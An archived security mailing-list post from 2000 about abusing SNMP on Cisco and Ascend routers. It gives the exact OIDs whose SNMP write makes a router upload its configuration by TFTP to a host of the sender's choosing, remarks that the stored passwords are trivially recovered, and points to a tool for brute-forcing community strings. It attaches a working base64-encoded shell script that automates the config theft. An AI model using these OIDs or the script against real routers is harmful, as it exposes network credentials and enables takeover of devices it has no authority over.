The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


cisco/ascend snmp config tool or exploit? -- snmp problems still alive


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Fri, 18 Feb 2000 01:17:52 -0600
From: monti <monti@USHOST.COM.>
To: [email protected]
Subject: cisco/ascend snmp config tool or exploit? -- Re: snmp problems still alive

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to [email protected] for more info.

--0-1115322660-950858272=:9410
Content-Type: TEXT/PLAIN; charset=US-ASCII


Disclaimer: The attached utility is based on widely known public
information and it's functionality is replicated in many very expensive
commercial products. This information is provided for educational purposes
only. I am not responsible for misuse of this tool or information.

May this script help make SNMP die the sad lonely death it deserves once
and for all!

On that note... I originally cobbled this together to keep the network
admins I worked with from doing annoying things like keeping tftp daemons
running on my Unix hosts for weeks on end. Its pretty handy for that too.

It's just a lame little script to automate snmp/tftp config dumps from
ciscos and ascends using snmp/tftp with a temporary tftp server. I
thought it might be of interest (to some) while we're on the subject
(again) of snmp router config downloads. I've seen several home-grown
versions of this for ciscos out there, a handful for ascends, but have not
run across any that do both, so...

The OID's to acomplish this on ciscos and ascends are below. Basically in
both cases doing an SNMP set on certain variables will trigger the tftp
config upload from the target router.

'XXX' denotes IP address octets for where you want the config to go.

Cisco:
SNMP set .1.3.6.1.4.1.9.2.1.55.XXX.XXX.XXX.XXX type=s(string) "tftp-filename"

Ascend:
SNMP set .1.3.6.1.4.1.529.9.5.3.0 type=a(addr) XXX.XXX.XXX.XXX
SNMP set .1.3.6.1.4.1.529.9.5.4.0 type=s(string) "tftp-filename"


As everybody knows, Cisco type 7 hashes are trivial, and ascends keep
passwords unencrypted, so this tool or one of the zillion others like it
(HP Openview anybody?) could be used by crazed frothy-mouthed sociopaths
to dish out truckloads of evil upon meek internet-shoppers!!!@!@#$!!!

As others already have mentioned, it's worse too since you could just
replace a config if you're in the mood. The OID's to accomplish that can
be found in the respective cisco and ascend MIBs nearby the ones outlined
above. I didnt put these in my script for fairly obvious reasons given
it's original intended users ;)


-Eric Monti

--BTW. 9 out of 10 'forgetful admins' recommend the use of ADMsnmp for
brute-forcing communities!

On Tue, 15 Feb 2000, Gus Huber wrote:

> It should be noted in this discussion that MANY of these devices also
> through SNMP querys can be completely compromised by either sending or
> recieving configuration files from arbritrary locations.  Both cisco and
> ascend products support downloading and uploading of configuration files
> via tftp from an SNMP query.  From that point it is trivial to sniff
> network trafic.  AFAIK, ascend still ships with the SNMP communitys set as
> public for read-only, and write for RW.  Also many hardware devices do not
> log querys sent to invalid SNMP communitys in SNMPv1, so it is a simple
> game of brute force to get those communitys.


--0-1115322660-950858272=:9410
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=grabrtrconf
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.3.96.1000218011752.9410D@mournblade.>
Content-Description:

IyEvYmluL3NoDQojICBncmFicnRyY29uZjoNCiMgIFB1bGwgcm91dGVyIGNv
bmZpZ3MgdmlhIHRmdHAgZm9yIGNpc2NvJ3MgYW5kIGFzY2VuZHMuIG9idmlv
dXNseSB0cml2aWFsIHRvDQojICBtb2RpZnkgdGhpcyBmb3Igb3RoZXIgbmV0
d29yayBoYXJkd2FyZSB0aGF0IHN1cHBvcnRzIHRoaXMgdHlwZSBvZiB0aGlu
Zy4NCiMNCiMgIC0gW3R5cGVdIGNhbiBiZSBvbmUgb2YgY2lzY28gfCBhc2Nl
bmQgY3VycmVudGx5DQojICAtIGRlZmF1bHRzIHRvIGNpc2NvDQojICAtIHJl
cXVpcmVzIGNtdSBzbm1wIHV0aWxpdGllcyAoc25tcHNldCBzcGVjaWZpY2Fs
bHkpDQojICAtIHVzZSBURlRQTElTVEVOIGFuZCBkaXNhYmxlIHRmdHAgZnJv
bSAvZXRjL2luZXRkLmNvbmYgaWYgeW91IHdhbnQgdG8NCiMgICAgbGF1bmNo
IGEgJ3RlbXBvcmFyeScgaW4udGZ0cGQganVzdCB0byBncmFiIHRoZSBmaWxl
Lg0KIyAgLSAncGlkb2YnIG9ubHkgZXhpc3RzIG9uIGxpbnV4IHRoYXQgSSBr
bm93IG9mIHdoaWNoIGtpbmRvZiBtYWtlcyB0aGlzIGEgDQojICAgIGxpbnV4
LW9ubHkgdG9vbCwgdW5sZXNzL3VudGlsIEkgZGVjaWRlIHRvIHN0b3AgcmVs
eWluZyBvbiBpdC4NCiMgIC0gU2V0ICdJTlQnIHRvIHdoYXRldmVyIHlvdXIg
cm91dGFibGUgSVAgaXMuDQojICAtIHJ1biBhcyByb290IChpZiB5b3Ugd2Fu
dCB0byBsYXVuY2ggdGhlIHRmdHAgc2VydmVyKQ0KIw0KIyAgLSBJIGtub3cg
dGhpcyBpcyBsYW1lLi4uIGJ1dCBpdCB3b3JrcyAobW9zdCBvZiB0aGUgdGlt
ZSkuDQojDQojICBieTogRXJpYyBNb250aSAxMS8xOTk3DQojIA0KDQpURlRQ
TElTVEVOPSJ0cnVlIg0KDQpESVI9L3RmdHBib290ICNtaWdodCB3YW50IHRv
IHVzZSBzb21ldGhpbmcgZWxzZQ0KV0FJVD02DQpJTlQ9cHBwMA0KIA0KdGVz
dCAiJDQiID0gIiIgJiYgZWNobyAiVXNhZ2U6IGBiYXNlbmFtZSAkMGAgdGFy
Z2V0IHdyaXRlLWNvbW11bml0eSB0ZnRwaG9zdCBmaWxlbmFtZSBbdHlwZV0i
ICYmIGV4aXQgMQ0KDQpUWVBFPSQ1DQp0ZXN0ICIkNSIgPSAiIiAmJiBUWVBF
PSJjaXNjbyINCg0KSVBBRERSPSQzDQp0ZXN0ICIkSVBBRERSIiA9ICIuIiAm
JiBJUEFERFI9YC9zYmluL2lmY29uZmlnICRJTlQgfCBncmVwIGluZXQgfCBz
ZWQgInMvXDovXCAvIiB8IGF3ayAne3ByaW50ICQzfSdgDQoNCmVjaG8gJDMN
Cg0KaWYgWyAtbiAkVEZUUExJU1RFTiBdO3RoZW4NCgllY2hvICJ0ZnRwIGRn
cmFtIHVkcCB3YWl0IHJvb3QgL3Vzci9zYmluL2luLnRmdHBkIGluLnRmdHBk
ICRESVIiID4gL3RtcC9pbmQuY29uZg0KCS91c3Ivc2Jpbi9pbmV0ZCAtZCAv
dG1wL2luZC5jb25mICYNCglybSAvdG1wL2luZC5jb25mDQoJcm0gLWYgJERJ
Ui8kNA0KCXRvdWNoICRESVIvJDQNCgljaG1vZCA2NjYgJERJUi8kNA0KZmkN
Cg0KI0NJU0NPIGdldCBjb25maWcNCnRlc3QgIiRUWVBFIiA9ICJjaXNjbyIg
JiYgXA0Kc25tcHNldCAtciAzIC10IDMgJDEgJDIgLjEuMy42LjEuNC4xLjku
Mi4xLjU1LiRJUEFERFIgcyAkNA0KDQojQVNDRU5EIGdldCBjb25maWcNCmlm
IFsgIiRUWVBFIiA9ICJhc2NlbmQiIF07dGhlbg0KICBzbm1wc2V0IC1yIDMg
LXQgMyAkMSAkMiAuMS4zLjYuMS40LjEuNTI5LjkuNS4zLjAgYSAkSVBBRERS
IA0KICBzbm1wc2V0IC1yIDMgLXQgMyAkMSAkMiAuMS4zLjYuMS40LjEuNTI5
LjkuNS40LjAgcyAkNA0KICBzbm1wc2V0IC1yIDMgJDEgJDIgLjEuMy42LjEu
NC4xLjUyOS45LjUuMS4wIGkgMw0KICBzbm1wc2V0IC1yIDMgJDEgJDIgLjEu
My42LjEuNC4xLjUyOS45LjUuMy4wIGEgIjAuMC4wLjAiDQogIHNubXBzZXQg
LXIgMyAkMSAkMiAuMS4zLjYuMS40LjEuNTI5LjkuNS40LjAgcyAiIg0KZmkN
Cg0Kc2xlZXAgJFdBSVQNCg0KIyBpIGdvdCBsYXp5IGFuZCB1c2VkIHBpZG9m
Li4uIHNvIHdoYXQuIA0KIyBJIG1hZGUgcHJldHR5IGRvdHMgYXBwZWFyIHRv
IG1ha2UgdXAgZm9yIGl0IQ0KaWYgKHRlc3QgYHBpZG9mIGluLnRmdHBkYCk7
dGhlbg0KDQoNCiBlY2hvIFJlY2VpdmluZyBmaWxlOiANCiB3aGlsZSAodGVz
dCAiYHBpZG9mIGluLnRmdHBkYCIpO2RvDQoJZWNobyAtbiAuDQoJc2xlZXAg
MQ0KIGRvbmUNCiBlY2hvDQogZWNobyBUcmFuc2ZlciBDb21wbGV0ZQ0KDQpm
aQ0KDQppZiBbIC1uICRURlRQTElTVEVOIF07dGhlbg0KCWtpbGwgYGNhdCAv
dmFyL3J1bi9pbmV0ZC5waWRgICMgamVlcGVycywgaSBob3BlIHRoYXQgd2Fz
bnQgdGhlIHJlYWwxDQpmaQ0KDQoNCg==
--0-1115322660-950858272=:9410--


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру